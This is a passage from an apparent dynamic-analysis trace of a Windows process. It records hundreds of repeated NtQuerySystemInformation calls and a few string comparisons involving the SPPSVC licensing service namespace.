ResultLength=0x0) [0212.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x28, ResultLength=0x0) [0212.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x28, ResultLength=0x0) [0212.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0212.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0212.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3f0, Length=0x20, ResultLength=0x0) [0212.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd370, Length=0x20, ResultLength=0x0) [0212.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd370, Length=0x20, ResultLength=0x0) [0212.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd370, Length=0x20, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0212.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0212.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd470, Length=0x20, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd470, Length=0x20, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d8, Length=0x50, ResultLength=0x0) [0212.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0212.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0212.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0212.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0212.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0212.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x28, ResultLength=0x0) [0212.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0212.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x28, ResultLength=0x0) [0212.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x28, ResultLength=0x0) [0212.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0212.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x20, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x20, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0212.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0212.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x28, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0212.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0212.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x20, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x20, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.972] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0212.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd868, Length=0x50, ResultLength=0x0) [0212.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0212.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0212.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0212.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0212.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0212.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0212.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0212.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0212.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0212.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb78, Length=0x50, ResultLength=0x0) [0212.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaf0, Length=0x28, ResultLength=0x0) [0212.982] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0212.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb78, Length=0x50, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb78, Length=0x50, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x50, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0212.983] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", 